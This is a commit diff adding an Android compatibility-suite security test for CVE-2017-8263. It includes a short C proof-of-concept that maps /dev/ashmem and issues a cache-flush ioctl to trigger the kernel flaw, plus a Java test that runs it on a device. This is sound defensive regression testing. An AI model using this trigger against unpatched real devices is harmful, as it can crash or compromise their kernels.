CTS/STS test for Android Security b/34126808

Bug:34126808
Change-Id: I5d1f0c8e8699e738363a773ed0155b55b912e9f9
(cherry picked from commit 74e0acf613e1b49e18e0f0aaeba810a667e1d2e6)
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 7c0783c..3c52d9d 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -62,6 +62,7 @@
         <option name="push" value="Bug-35048450->/data/local/tmp/Bug-35048450" />
         <option name="push" value="Bug-35047217->/data/local/tmp/Bug-35047217" />
         <option name="push" value="CVE-2017-0705->/data/local/tmp/CVE-2017-0705" />
+        <option name="push" value="CVE-2017-8263->/data/local/tmp/CVE-2017-8263" />
         <option name="append-bitness" value="true" />
     </target_preparer>
     <test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
diff --git a/hostsidetests/security/securityPatch/CVE-2017-8263/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-8263/Android.mk
new file mode 100644
index 0000000..0d1d60b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-8263/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project

+#

+# Licensed under the Apache License, Version 2.0 (the "License");

+# you may not use this file except in compliance with the License.

+# You may obtain a copy of the License at

+#

+#      http://www.apache.org/licenses/LICENSE-2.0

+#

+# Unless required by applicable law or agreed to in writing, software

+# distributed under the License is distributed on an "AS IS" BASIS,

+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.

+# See the License for the specific language governing permissions and

+# limitations under the License.

+

+LOCAL_PATH := $(call my-dir)

+

+include $(CLEAR_VARS)

+LOCAL_MODULE := CVE-2017-8263

+LOCAL_SRC_FILES := poc.c

+LOCAL_MULTILIB := both

+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32

+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64

+

+# Tag this module as a cts test artifact

+LOCAL_COMPATIBILITY_SUITE := cts

+LOCAL_CTS_TEST_PACKAGE := android.security.cts

+

+LOCAL_ARM_MODE := arm

+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement

+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef

+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes

+CFLAGS += -Iinclude -fPIE

+LOCAL_LDFLAGS += -fPIE -pie

+LDFLAGS += -rdynamic

+include $(BUILD_CTS_EXECUTABLE)

diff --git a/hostsidetests/security/securityPatch/CVE-2017-8263/local_poc.h b/hostsidetests/security/securityPatch/CVE-2017-8263/local_poc.h
new file mode 100644
index 0000000..a75782b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-8263/local_poc.h
@@ -0,0 +1,50 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#ifndef _LINUX_ASHMEM_H
+#define _LINUX_ASHMEM_H
+#include <linux/limits.h>
+#include <linux/ioctl.h>
+#define ASHMEM_NAME_LEN   256
+#define ASHMEM_NAME_DEF   "dev/ashmem"
+ /* Return values from ASHMEM_PIN: Was the mapping purged while unpinned? */
+#define ASHMEM_NOT_PURGED 0
+#define ASHMEM_WAS_PURGED 1
+ /* Return values from ASHMEM_GET_PIN_STATUS: Is the mapping pinned? */
+#define ASHMEM_IS_UNPINNED  0
+#define ASHMEM_IS_PINNED  1
+struct ashmem_pin {
+    __u32 offset; /* offset into region, in bytes, page-aligned */
+    __u32 len;  /* length forward from offset, in bytes, page-aligned */
+};
+#define __ASHMEMIOC   0x77
+#define ASHMEM_SET_NAME   _IOW(__ASHMEMIOC, 1, char[ASHMEM_NAME_LEN])
+#define ASHMEM_GET_NAME   _IOR(__ASHMEMIOC, 2, char[ASHMEM_NAME_LEN])
+#define ASHMEM_SET_SIZE   _IOW(__ASHMEMIOC, 3, size_t)
+#define ASHMEM_GET_SIZE   _IO(__ASHMEMIOC, 4)
+#define ASHMEM_SET_PROT_MASK  _IOW(__ASHMEMIOC, 5, unsigned long)
+#define ASHMEM_GET_PROT_MASK  _IO(__ASHMEMIOC, 6)
+#define ASHMEM_PIN    _IOW(__ASHMEMIOC, 7, struct ashmem_pin)
+#define ASHMEM_UNPIN    _IOW(__ASHMEMIOC, 8, struct ashmem_pin)
+#define ASHMEM_GET_PIN_STATUS _IO(__ASHMEMIOC, 9)
+#define ASHMEM_PURGE_ALL_CACHES _IO(__ASHMEMIOC, 10)
+#define ASHMEM_CACHE_FLUSH_RANGE  _IO(__ASHMEMIOC, 11)
+#define ASHMEM_CACHE_CLEAN_RANGE  _IO(__ASHMEMIOC, 12)
+#define ASHMEM_CACHE_INV_RANGE    _IO(__ASHMEMIOC, 13)
+int get_ashmem_file(int fd, struct file **filp, struct file **vm_file,
+                          unsigned long *len);
+void put_ashmem_file(struct file *file);
+#endif  /* _LINUX_ASHMEM_H */
diff --git a/hostsidetests/security/securityPatch/CVE-2017-8263/poc.c b/hostsidetests/security/securityPatch/CVE-2017-8263/poc.c
new file mode 100644
index 0000000..687bbc5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-8263/poc.c
@@ -0,0 +1,51 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <fcntl.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <stdio.h>
+#include "local_poc.h"
+
+
+int main() {
+    int fd;
+    int ret;
+    uint64_t mmap_ret;
+
+    fd = open("/dev/ashmem", 0, 0);
+    if (fd < 0) {
+        return -1;
+    }
+
+    ret = ioctl(fd, ASHMEM_SET_SIZE, 0x1000);
+    if (ret < 0) {
+        return -1;
+    }
+
+    mmap_ret = (uint64_t) mmap((void *) 0x7f0000000 /*addr*/, 0x1000 /*length*/, 0x0 /*prot*/,
+            0x12 /*flags=MAP_FIXED|MAP_PRIVATE*/, fd, 0x0 /*offset*/);
+    if (mmap_ret == MAP_FAILED) {
+        return -1;
+    }
+
+    ret = ioctl(fd, ASHMEM_CACHE_FLUSH_RANGE, NULL);
+    if (ret < 0) {
+        return -1;
+    }
+    return 0;
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_07.java b/hostsidetests/security/src/android/security/cts/Poc17_07.java
index 8a76f13..6c4a2f3 100644
--- a/hostsidetests/security/src/android/security/cts/Poc17_07.java
+++ b/hostsidetests/security/src/android/security/cts/Poc17_07.java
@@ -53,4 +53,15 @@
             AdbUtils.runPoc("CVE-2017-0705", getDevice(), 60);
         }
     }
+
+    /**
+     *  b/34126808
+     */
+    @SecurityTest
+    public void testPocCVE_2017_8263() throws Exception {
+        enableAdbRoot(getDevice());
+        if(containsDriver(getDevice(), "/dev/ashmem")) {
+            AdbUtils.runPoc("CVE-2017-8263", getDevice(), 60);
+        }
+    }
 }